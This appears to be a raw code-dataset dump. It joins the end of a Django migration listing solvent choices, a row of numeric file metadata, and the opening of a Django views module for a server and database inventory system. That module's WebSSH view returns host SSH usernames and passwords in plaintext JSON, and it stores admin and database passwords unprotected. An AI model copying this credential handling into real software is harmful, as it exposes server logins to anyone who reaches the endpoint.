field=models.CharField(blank=True, choices=[('water', '1. water'), ('1-octanol', '2. 1-octanol'), ('benzene', '3. benzene'), ('cyclohexane', '4. cyclohexane'), ('dibutylether', '5. dibutylether'), ('octane', '6. octane'), ('butanol', '7. butanol'), ('carbontet', '8. carbontet'), ('chloroform', '9. chloroform'), ('decane', '10. decane'), ('1,1-dichloroethane', '11. 1,1-dichloroethane'), ('dimethylformamide', '12. dimethylformamide'), ('dimethylsulfoxide', '13. dimethylsulfoxide'), ('dodecane', '14. dodecane'), ('ethanol', '15. ethanol'), ('heptane', '16. heptane'), ('hexadecane', '17. hexadecane'), ('hexane', '18. hexane'), ('isooctane', '19. isooctane'), ('nonane', '20. nonane'), ('pentane', '21. pentane'), ('toluene', '22. toluene'), ('undecane', '23. undecane'), ('acetonitrile', '24. acetonitrile'), ('ethylacetate', '25. ethylacetate'), ('methanol', '26. methanol'), ('methanol_50_water_50', '27. methanol_50_water_50'), ('acetonitrile_40_water_60', '28. acetonitrile_40_water_60'), ('acetonitrile_60_water_40', '29. acetonitrile_60_water_40'), ('2-methylpyridine', '30. 2-methylpyridine'), ('4-methylpentan-2-one', '31. 4-methylpentan-2-one'), ('acetic acid', '32. acetic acid'), ('1-phenylethanone', '33. 1-phenylethanone'), ('aniline', '34. aniline'), ('anisole', '35. anisole'), ('benzonitrile', '36. benzonitrile'), ('phenylmethanol', '37. phenylmethanol'), ('bromobenzene', '38. bromobenzene'), ('bromoethane', '39. bromoethane'), ('bromoform', '40. bromoform'), ('butan-2-one', '41. butan-2-one'), ('butyl acetate', '42. butyl acetate'), ('butylbenzene', '43. butylbenzene'), ('carbon disulfide', '44. carbon disulfide'), ('chlorobenzene', '45. chlorobenzene'), ('1-chlorohexane', '46. 1-chlorohexane'), ('cyclohexanone', '47. cyclohexanone'), ('decalin', '48. decalin'), ('decan-1-ol', '49. decan-1-ol'), ('1,1-dibromoethane', '50. 1,1-dibromoethane'), ('1,2-dichloroethane', '51. 1,2-dichloroethane'), ('ethoxyethane', '52. ethoxyethane'), ('2-propan-2-yloxypropane', '53. 2-propan-2-yloxypropane'), ('N,N-dimethylacetamide', '54. N,N-dimethylacetamide'), ('ethoxybenzene', '55. ethoxybenzene'), ('ethylbenzene', '56. ethylbenzene'), ('fluorobenzene', '57. fluorobenzene'), ('heptan-1-ol', '58. heptan-1-ol'), ('1-iodohexadecane', '59. 1-iodohexadecane'), ('hexan-1-ol', '60. hexan-1-ol'), ('iodobenzene', '61. iodobenzene'), ('2-methylpropan-1-ol', '62. 2-methylpropan-1-ol'), ('propan-2-ol', '63. propan-2-ol'), ('cumene', '64. cumene'), ('3-methylphenol', '65. 3-methylphenol'), ('2-methoxyethanol', '66. 2-methoxyethanol'), ('dichloromethane', '67. dichloromethane'), ('N-methylformamide', '68. N-methylformamide'), ('nitrobenzene', '69. nitrobenzene'), ('1-nitroethane', '70. 1-nitroethane'), ('nitromethane', '71. nitromethane'), ('nonan-1-ol', '72. nonan-1-ol'), ('1,2-dichlorobenzene', '73. 1,2-dichlorobenzene'), ('pentadecane', '74. pentadecane'), ('pentan-1-ol', '75. pentan-1-ol'), ('hexafluorobenzene', '76. hexafluorobenzene'), ('propan-1-ol', '77. propan-1-ol'), ('pyridine', '78. pyridine'), ('butan-2-ol', '79. butan-2-ol'), ('tert-butylbenzene', '80. tert-butylbenzene'), ('1,1,2,2-tetrachloroethene', '81. 1,1,2,2-tetrachloroethene'), ('oxolane', '82. oxolane'), ('1,2,3,4-tetrahydronaphthalene', '83. 1,2,3,4-tetrahydronaphthalene'), ('tributyl phosphate', '84. tributyl phosphate'), ('N,N-diethylethanamine', '85. N,N-diethylethanamine'), ('1,2,4-trimethylbenzene', '86. 1,2,4-trimethylbenzene'), ('1,4-xylene', '87. 1,4-xylene'), ('2-methylpropan-2-ol', '88. 2-methylpropan-2-ol'), ('3-methylbutan-1-ol', '89. 3-methylbutan-1-ol'), ('undecan-1-ol', '90. undecan-1-ol'), ('propan-2-one', '91. propan-2-one'), ('methyl acetate', '92. methyl acetate'), ('propyl acetate', '93. propyl acetate'), ('pentyl acetate', '94. pentyl acetate'), ('2-methylbutan-2-ol', '95. 2-methylbutan-2-ol'), ('4-methylpentan-2-ol', '96. 4-methylpentan-2-ol'), ('2-methylpentan-1-ol', '97. 2-methylpentan-1-ol'), ('2-ethylhexan-1-ol', '98. 2-ethylhexan-1-ol'), ('2-methoxy-2-methylpropane', '99. 2-methoxy-2-methylpropane'), ('dodecan-1-ol', '100. dodecan-1-ol'), ('2-butoxyethanol', '101. 2-butoxyethanol'), ('2-ethoxyethanol', '102. 2-ethoxyethanol'), ('1-propoxypropane', '103. 1-propoxypropane'), ('pentan-2-ol', '104. pentan-2-ol'), ('2-methylbutan-1-ol', '105. 2-methylbutan-1-ol'), ('pentan-3-ol', '106. pentan-3-ol'), ('2-propoxyethanol', '107. 2-propoxyethanol'), ('2-propan-2-yloxyethanol', '108. 2-propan-2-yloxyethanol'), ('3-methoxybutan-1-ol', '109. 3-methoxybutan-1-ol'), ('1-tert-butoxy-2-propanol', '110. 1-tert-butoxy-2-propanol'), ('2-methoxy-2-methylbutane', '111. 2-methoxy-2-methylbutane'), ('pentan-2-one', '112. pentan-2-one'), ('ethyl butanoate', '113. ethyl butanoate'), ('heptan-2-one', '114. heptan-2-one'), ('hexyl acetate', '115. hexyl acetate'), ('1-nitro-2-octoxybenzene', '116. 1-nitro-2-octoxybenzene'), ('1-methylpyrrolidin-2-one', '117. 1-methylpyrrolidin-2-one'), ('N-methylacetamide', '118. N-methylacetamide'), ('morpholine-4-carbaldehyde', '119. morpholine-4-carbaldehyde'), ('N,N-dibutylformamide', '120. N,N-dibutylformamide'), ('formamide', '121. formamide'), ('N,N-diethylacetamide', '122. N,N-diethylacetamide'), ('1-methylpiperidin-2-one', '123. 1-methylpiperidin-2-one'), ('N-ethylformamide', '124. N-ethylformamide'), ('N-ethylacetamide', '125. N-ethylacetamide'), ('triolein', '126. triolein'), ('deca-1,9-diene', '127. deca-1,9-diene'), ('hexadec-1-ene', '128. hexadec-1-ene'), ('1,3-xylene', '129. 1,3-xylene'), ('1,2-xylene', '130. 1,2-xylene'), ('1,4-dioxane', '131. 1,4-dioxane'), ('1-chlorobutane', '132. 1-chlorobutane'), ('1,1,2,2-tetrabromoethane', '133. 1,1,2,2-tetrabromoethane'), ('1,1,2,2-tetrachloroethane', '134. 1,1,2,2-tetrachloroethane'), ('propane-1,2-diol', '135. propane-1,2-diol'), ('1,3-dimethylimidazolidin-2-one', '136. 1,3-dimethylimidazolidin-2-one'), ('propane-1,3-diol', '137. propane-1,3-diol'), ('butane-1,4-diol', '138. butane-1,4-diol'), ('pentane-1,5-diol', '139. pentane-1,5-diol'), ('1-bromonaphthalene', '140. 1-bromonaphthalene'), ('1-chloronaphthalene', '141. 1-chloronaphthalene'), ('dec-1-ene', '142. dec-1-ene'), ('hex-1-ene', '143. hex-1-ene'), ('1-nitropropane', '144. 1-nitropropane'), ('oct-1-ene', '145. oct-1-ene'), ('2-sulfanylethanol', '146. 2-sulfanylethanol'), ('3-methylthiolane 1,1-dioxide', '147. 3-methylthiolane 1,1-dioxide'), ('hexanedinitrile', '148. hexanedinitrile'), ('benzyl acetate', '149. benzyl acetate'), ('cyclohexylcyclohexane', '150. cyclohexylcyclohexane'), ('butanenitrile', '151. butanenitrile'), ('cis-1,2-dichloroethene', '152. cis-1,2-dichloroethene'), ('cis-decaline', '153. cis-decaline'), ('cyclohexanol', '154. cyclohexanol'), ('cyclohexylbenzene', '155. cyclohexylbenzene'), ('cyclopentanone', '156. cyclopentanone'), ('deuterated water', '157. deuterated water'), ('bis(2-ethylhexyl) hexanedioate', '158. bis(2-ethylhexyl) hexanedioate'), ('2,2-dichloroacetic acid', '159. 2,2-dichloroacetic acid'), ('diethyl benzene-1,2-dicarboxylate', '160. diethyl benzene-1,2-dicarboxylate'), ('2-(2-hydroxyethoxy)ethanol', '161. 2-(2-hydroxyethoxy)ethanol'), ('1-ethoxy-2-(2-ethoxyethoxy)ethane', '162. 1-ethoxy-2-(2-ethoxyethoxy)ethane'), ('1-methoxy-2-(2-methoxyethoxy)ethane', '163. 1-methoxy-2-(2-methoxyethoxy)ethane'), ('diiodomethane', '164. diiodomethane'), ('dibutyl benzene-1,2-dicarboxylate', '165. dibutyl benzene-1,2-dicarboxylate'), ('dinonyl benzene-1,2-dicarboxylate', '166. dinonyl benzene-1,2-dicarboxylate'), ('bis(2-ethylhexyl) phthalate', '167. bis(2-ethylhexyl) phthalate'), ('3-(3-hydroxypropoxy)propan-1-ol', '168. 3-(3-hydroxypropoxy)propan-1-ol'), ('ethane-1,2-diol', '169. ethane-1,2-diol'), ('furan-2-carbaldehyde', '170. furan-2-carbaldehyde'), ('furan-2-ylmethanol', '171. furan-2-ylmethanol'), ('oxolan-2-one', '172. oxolan-2-one'), ('1H-indene', '173. 1H-indene'), ('2-aminoethanol', '174. 2-aminoethanol'), ('1-ethylpyrrolidin-2-one', '175. 1-ethylpyrrolidin-2-one'), ('tetradecane', '176. tetradecane'), ('tridecane', '177. tridecane'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane'), ('perflexane', '179. perflexane'), ('perfluorooctane', '180. perfluorooctane'), ('2-phenylacetonitrile', '181. 2-phenylacetonitrile'), ('propanenitrile', '182. propanenitrile'), ('4-methyl-1,3-dioxolan-2-one', '183. 4-methyl-1,3-dioxolan-2-one'), ('quinoline', '184. quinoline'), ('2-chlorobutane', '185. 2-chlorobutane'), ('squalane', '186. squalane'), ('tetraethylene glycol', '187. tetraethylene glycol'), ('tetraglyme', '188. tetraglyme'), ('thiodiglycol', '189. thiodiglycol'), ('trans-1,2-dichloroethene', '190. trans-1,2-dichloroethene'), ('trans-decalin', '191. trans-decalin'), ('N,N-dipentylpentan-1-amine', '192. N,N-dipentylpentan-1-amine'), ('tricaprylin', '193. tricaprylin'), ('triethyl phosphate', '194. triethyl phosphate'), ('triethylene glycol', '195. triethylene glycol'), ('triglyme', '196. triglyme'), ('N,N-dibutylbutan-1-amine', '197. N,N-dibutylbutan-1-amine'), ('N,N-dioctyloctan-1-amine', '198. N,N-dioctyloctan-1-amine'), ('hexamethylphosphoramide', '199. hexamethylphosphoramide'), ('dimethyl carbonate', '200. dimethyl carbonate'), ('diethyl carbonate', '201. diethyl carbonate')], max_length=200, verbose_name='Solvent (Optional)'),
),
migrations.AlterField(
model_name='solventselection',
name='solvent_temp',
field=models.CharField(blank=True, choices=[('water', '1. water: ~298 K - 647.09 K'), ('benzene', '3. benzene: ~298 K - 562.01 K'), ('cyclohexane', '4. cyclohexane: ~298 K - 553.59 K'), ('octane', '6. octane: ~298 K - 569.31 K'), ('decane', '10. decane: ~298 K - 617.69 K'), ('dodecane', '14. dodecane: ~298 K - 658.09 K'), ('ethanol', '15. ethanol: ~298 K - 514.70 K'), ('heptane', '16. heptane: ~298 K - 540.12 K'), ('hexane', '18. hexane: ~298 K - 507.81 K'), ('nonane', '20. nonane: ~298 K - 594.54 K'), ('pentane', '21. pentane: ~298 K - 469.69 K'), ('toluene', '22. toluene: ~298 K - 591.74 K'), ('undecane', '23. undecane: ~298 K - 638.79 K'), ('methanol', '26. methanol: ~298 K - 512.49 K'), ('1,2-dichloroethane', '51. 1,2-dichloroethane: ~298 K - 561.59 K'), ('ethoxyethane', '52. ethoxyethane: ~298 K - 466.69 K'), ('ethylbenzene', '56. ethylbenzene: ~298 K - 617.11 K'), ('1,4-xylene', '87. 1,4-xylene: ~298 K - 616.16 K'), ('propan-2-one', '91. propan-2-one: ~298 K - 508.09 K'), ('1,3-xylene', '129. 1,3-xylene: ~298 K - 616.88 K'), ('1,2-xylene', '130. 1,2-xylene: ~298 K - 630.25 K'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane: ~298 K - 586.49 K'), ('dimethyl carbonate', '200. dimethyl carbonate: ~298 K - 556.99 K')], max_length=200, verbose_name='Solvent'),
),
]
| 372.730159
| 9,268
| 0.660378
| 2,993
| 23,482
| 5.146676
| 0.174741
| 0.00831
| 0.01558
| 0.003116
| 0.926058
| 0.918657
| 0.906063
| 0.889055
| 0.883472
| 0.880096
| 0
| 0.095267
| 0.100162
| 23,482
| 62
| 9,269
| 378.741935
| 0.633649
| 0.001916
| 0
| 0.571429
| 1
| 0
| 0.693407
| 0.159036
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4dbab05ea921fa1c20955195624eb525f072b458
| 89,953
|
py
|
Python
|
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
######################################
# Django 模块
######################################
from django.shortcuts import render, HttpResponseRedirect, redirect, reverse
from django.views import View
from django.http import HttpResponse
from django.db.models import Q
from django.urls import reverse
######################################
# 第三方模块
######################################
from pure_pagination import PageNotAnInteger, Paginator, EmptyPage
######################################
# 系统模块
######################################
import json
import datetime
######################################
# 自建模块
######################################
from utils.login_check import LoginStatusCheck
from .forms import *
from .models import *
from operation_record.models import UserOperationRecord
from opms.settings import WEBSSH_IP, WEBSSH_PORT
##############################################################################
# 主机资产模块
##############################################################################
######################################
# 主机列表
######################################
class HostListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'host'
web_chose_middle = ''
# 操作系统
systems = OperatingSystemInfo.objects.filter(status=1)
# 项目
projects = ProjectInfo.objects.filter(status=1)
# 机房
idcs = IdcInfo.objects.filter(status=1)
# 环境
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# 用途
uses = UseInfo.objects.filter(status=1)
# 用户
users = UserProfile.objects.filter(status=1)
# 获取主机记录
host_records = HostInfo.objects.filter(status=1).order_by('-update_time')
# 筛选条件
project = int(request.GET.get('project', '0'))
if project != 0:
host_records = host_records.filter(project_id=project)
idc = int(request.GET.get('idc', '0'))
if idc != 0:
host_records = host_records.filter(idc_id=idc)
env = int(request.GET.get('env', '0'))
if env != 0:
host_records = host_records.filter(op_env_id=env)
use = int(request.GET.get('use', '0'))
if use != 0:
host_records = host_records.filter(use_id=use)
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
host_records = host_records.filter(Q(hostname__icontains=keyword) | Q(
use__name__icontains=keyword) | Q(project__name__icontains=keyword) | Q(desc__icontains=keyword))
# 记录数量
record_nums = host_records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(host_records, 16, request=request)
# 分页处理后的 QuerySet
host_records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'systems': systems,
'projects': projects,
'idcs': idcs,
'envs': envs,
'uses': uses,
'users': users,
'project': project,
'idc': idc,
'env': env,
'use': use,
'keyword': keyword,
'host_records': host_records,
'record_nums': record_nums,
'WEBSSH_IP': WEBSSH_IP,
'WEBSSH_PORT': WEBSSH_PORT,
}
return render(request, 'host_management/host/host_list.html', context=context)
else:
return HttpResponse(status=403)
########################################################################################################################
## wessh主机视图
########################################################################################################################
class WebSSHView(LoginStatusCheck, View):
def post(self, request, host_id):
host = HostInfo.objects.get(id=int(host_id))
ret = {}
try:
if host.out_ip:
ip = host.out_ip
else:
ip = host.in_ip
port = host.ssh_port
if host.normal_user:
username = host.normal_user
password = host.normal_pass
else:
username = host.admin_user
password = host.admin_pass
ret = {"ip": ip, 'port': port, "username": username, 'password': password, "static": True}
except Exception as e:
ret['status'] = False
ret['error'] = '请求错误,{}'.format(e)
finally:
return HttpResponse(json.dumps(ret))
######################################
# 添加主机
######################################
class AddHostInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_host_info_form = AddHostInfoForm(request.POST)
if add_host_info_form.is_valid():
in_ip = request.POST.get('in_ip')
if HostInfo.objects.filter(in_ip=in_ip).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该 IP 的主机已经存在,请检查!"}',
content_type='application/json')
host = HostInfo()
host.in_ip = request.POST.get('in_ip')
host.out_ip = request.POST.get('out_ip', '')
host.system_id = int(request.POST.get('system'))
host.hostname = request.POST.get('hostname')
host.cpu = request.POST.get('cpu')
host.disk = int(request.POST.get('disk'))
host.memory = int(request.POST.get('memory'))
host.network = int(request.POST.get('network'))
host.ssh_port = int(request.POST.get('ssh_port'))
host.root_ssh = request.POST.get('root_ssh')
host.op_env_id = int(request.POST.get('op_env'))
host.use_id = int(request.POST.get('use'))
host.project_id = int(request.POST.get('project'))
host.idc_id = int(request.POST.get('idc'))
host.admin_user = request.POST.get('admin_user')
host.admin_pass = request.POST.get('admin_pass')
host.normal_user = request.POST.get('normal_user', '')
host.normal_pass = request.POST.get('normal_pass', '')
host.op_user_id = int(request.POST.get('op_user'))
host.update_user = request.user
host.desc = request.POST.get('desc', '')
host.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 1
op_record.action = "添加 [ %s ] 机房主机:%s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机信息添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"主机信息填写错误,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 主机详情
######################################
class HostInfoView(LoginStatusCheck, View):
def get(self, request, host_id):
# 页面选择
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'host'
web_chose_middle = ''
# 操作系统
systems = OperatingSystemInfo.objects.filter(status=1)
# 项目
projects = ProjectInfo.objects.filter(status=1)
# 机房
idcs = IdcInfo.objects.filter(status=1)
# 环境
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# 用途
uses = UseInfo.objects.filter(status=1)
# 用户
users = UserProfile.objects.filter(status=1)
# 信息
records = HostInfo.objects.get(id=host_id)
# 服务
services = HostServiceInfo.objects.filter(host_id=host_id).filter(status=1)
# 判断是否添加数据库
is_install_db = DatabaseInfo.objects.filter(host_id=int(host_id)).filter(status=1)
if is_install_db:
for each in is_install_db:
have_db_id = each.id
else:
have_db_id = ''
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'systems': systems,
'projects': projects,
'idcs': idcs,
'envs': envs,
'uses': uses,
'users': users,
'services': services,
'have_db_id': have_db_id,
}
return render(request, 'host_management/host/host_info.html', context=context)
######################################
# 删除主机
######################################
class DeleteHostView(LoginStatusCheck, View):
def post(self, request):
try:
host_id = request.POST.get('host_id')
host = HostInfo.objects.get(id=int(host_id))
host.update_user = request.user
host.status = 0
host.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 4
op_record.action = "停用 [ %s ] 机房主机:%s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机删除成功!"}', content_type='application/json')
except Exception as e:
return HttpResponse('{"status":"falied", "msg":"主机删除失败!"}', content_type='application/json')
######################################
# 修改主机
######################################
class EditHostInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_host_info_form = EditHostInfoForm(request.POST)
if edit_host_info_form.is_valid():
# 获取主机
host_id = int(request.POST.get('host_id'))
host = HostInfo.objects.get(id=host_id)
host.in_ip = request.POST.get('in_ip')
host.out_ip = request.POST.get('out_ip', '')
host.system_id = int(request.POST.get('system'))
host.hostname = request.POST.get('hostname')
host.cpu = request.POST.get('cpu')
host.disk = int(request.POST.get('disk'))
host.memory = int(request.POST.get('memory'))
host.network = int(request.POST.get('network'))
host.ssh_port = int(request.POST.get('ssh_port'))
host.root_ssh = request.POST.get('root_ssh')
host.op_env_id = int(request.POST.get('op_env'))
host.use_id = int(request.POST.get('use'))
host.project_id = int(request.POST.get('project'))
host.idc_id = int(request.POST.get('idc'))
host.admin_user = request.POST.get('admin_user')
host.admin_pass = request.POST.get('admin_pass')
host.normal_user = request.POST.get('normal_user', '')
host.normal_pass = request.POST.get('normal_pass', '')
host.op_user_id = int(request.POST.get('op_user'))
host.update_user = request.user
host.desc = request.POST.get('desc', '')
host.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 2
op_record.action = "修改 [ %s ] 机房主机:%s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机信息修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"主机信息填写错误,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 数据库列表
######################################
class DatabaseListView(LoginStatusCheck, View):
def get(self, request):
# 页面选择
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'database'
web_chose_middle = ''
# 主机列表
hosts = HostInfo.objects.filter(status=1)
# 机房
idcs = IdcInfo.objects.filter(status=1)
# 环境
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# 用户
users = UserProfile.objects.filter(status=1)
# 数据库记录
db_records = DatabaseInfo.objects.filter(status=1).order_by('-update_time')
# 筛选条件
idc = int(request.GET.get('idc', '0'))
if idc != 0:
db_records = db_records.filter(host__idc_id=idc)
env = int(request.GET.get('env', '0'))
if env != 0:
db_records = db_records.filter(host__op_env_id=env)
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
db_records = db_records.filter(Q(host__in_ip=keyword))
# 记录数量
record_nums = db_records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(db_records, 16, request=request)
# 分页处理后的 QuerySet
db_records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'hosts': hosts,
'idcs': idcs,
'envs': envs,
'idc': idc,
'env': env,
'users': users,
'keyword': keyword,
'record_nums': record_nums,
'db_records': db_records,
}
return render(request, 'host_management/host/db_list.html', context=context)
######################################
# 数据库详情
######################################
class DatabaseInfoView(LoginStatusCheck, View):
def get(self, request, db_id):
# 页面选择
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'database'
web_chose_middle = ''
# 数据库基本信息
db_records = DatabaseInfo.objects.get(id=int(db_id))
# 数据库库信息
db_db_records = DatabaseDBInfo.objects.filter(db_id=int(db_id)).filter(status=1).order_by('-update_time')
# 数据库用户信息
db_user_records = DatabaseUserInfo.objects.filter(db_id=int(db_id)).filter(status=1).order_by('-update_time')
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'db_records': db_records,
'db_db_records': db_db_records,
'db_user_records': db_user_records,
}
return render(request, 'host_management/host/db_info.html', context=context)
######################################
# 添加数据库记录
######################################
class AddDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
if DatabaseInfo.objects.filter(host_id=int(request.POST.get('host_id'))).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该主机的记录已经存在,请检查!"}', content_type='application/json')
add_db_info_form = AddDatabaseInfoForm(request.POST)
if add_db_info_form.is_valid():
db_info = DatabaseInfo()
db_info.host_id = int(request.POST.get('host_id'))
db_info.db_name = request.POST.get('db_name')
db_info.db_version = request.POST.get('db_version')
db_info.db_admin_user = request.POST.get('db_admin_user')
db_info.db_admin_pass = request.POST.get('db_admin_pass')
db_info.desc = request.POST.get('desc', '')
db_info.add_user = request.user
db_info.update_user = request.user
db_info.status = 1
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 1
op_record.action = "添加数据库记录:%s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 修改数据库记录
######################################
class EditDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_db_info_form = EditDatabaseInfoForm(request.POST)
if edit_db_info_form.is_valid():
db_info = DatabaseInfo.objects.get(id=int(request.POST.get('db_id')))
# 判断记录是否重复
db_host = int(request.POST.get('host_id'))
if db_info.host_id != db_host:
if DatabaseInfo.objects.filter(host_id=db_host).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该主机的记录已经存在,请检查!"}',
content_type='application/json')
# 不重复继续修改
db_info.host_id = db_host
db_info.db_name = request.POST.get('db_name')
db_info.db_version = request.POST.get('db_version')
db_info.db_admin_user = request.POST.get('db_admin_user')
db_info.db_admin_pass = request.POST.get('db_admin_pass')
db_info.desc = request.POST.get('desc', '')
db_info.update_user = request.user
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 2
op_record.action = "修改数据库记录:%s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除数据库记录
######################################
class DeleteDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseInfo.objects.get(id=int(request.POST.get('db_id')))
db_info.status = 0
db_info.update_user = request.user
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 4
op_record.action = "停用数据库记录:%s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 添加数据库库
######################################
class AddDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
if DatabaseDBInfo.objects.filter(db_id=int(request.POST.get('db_id'))).filter(
name=request.POST.get('name')).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
add_db_form = AddDatabaseDBForm(request.POST)
if add_db_form.is_valid():
db_info = DatabaseDBInfo()
db_info.db_id = int(request.POST.get('db_id'))
db_info.name = request.POST.get('name')
db_info.use = request.POST.get('use')
db_info.desc = request.POST.get('desc', '')
db_info.add_user = request.user
db_info.update_user = request.user
db_info.status = 1
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 1
op_record.action = "添加主机 [ %s ] 的数据库:%s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑数据库库
######################################
class EditDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseDBInfo.objects.get(id=int(request.POST.get('db_id')))
# 判断记录是否存在
if db_info.name != request.POST.get('name'):
if DatabaseDBInfo.objects.filter(db_id=int(request.POST.get('db_db_id'))).filter(
name=request.POST.get('name')).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
edit_db_form = EditDatabaseDBForm(request.POST)
if edit_db_form.is_valid():
db_info.db_id = int(request.POST.get('db_db_id'))
db_info.name = request.POST.get('name')
db_info.use = request.POST.get('use')
db_info.desc = request.POST.get('desc', '')
db_info.update_user = request.user
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 2
op_record.action = "修改主机 [ %s ] 的数据库:%s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除数据库库
######################################
class DeleteDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseDBInfo.objects.get(id=int(request.POST.get('db_id')))
db_info.update_user = request.user
db_info.status = 0
db_info.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.operation = 4
op_record.action = "删除主机 [ %s ] 的数据库:%s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 添加数据库用户
